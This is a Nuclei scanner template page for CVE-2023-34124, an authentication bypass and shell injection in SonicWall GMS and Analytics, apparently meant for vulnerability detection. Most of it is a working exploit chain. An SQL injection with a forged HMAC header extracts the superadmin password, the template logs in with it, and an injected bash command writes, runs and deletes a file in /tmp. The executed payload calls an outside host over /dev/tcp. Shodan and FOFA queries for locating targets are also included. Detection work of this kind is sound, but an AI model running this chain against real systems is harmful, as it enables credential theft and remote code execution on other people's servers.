SonicWall GMS and Analytics Web Services - Shell Injection

ID: CVE-2023-34124

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive

Description

The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions

YAML Source

id: CVE-2023-34124

info:
  name: SonicWall GMS and Analytics Web Services - Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34124
    cwe-id: CWE-287,CWE-305
    epss-score: 0.03433
    epss-percentile: 0.91476
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:-1381126564
    fofa-query: icon_hash=-1381126564
  tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive
variables:
  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: json
        part: body
        internal: true
        name: alias
        group: 1
        json:
          - '.alias'

      - type: regex
        part: body
        internal: true
        name: servertoken
        group: 1
        regex:
          - "getPwdHash.*,'([0-9]+)'"
# digest: 4b0a00483046022100f924254dee70f4c9507b01ac1ef4e94911b8a694b6fb7daa07a3f1dcb0bbbb060221009132d652a5f53242d9864478eaa301c02195fd754fe067c7527fedf7c6101f3d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34124.yaml"

View on Github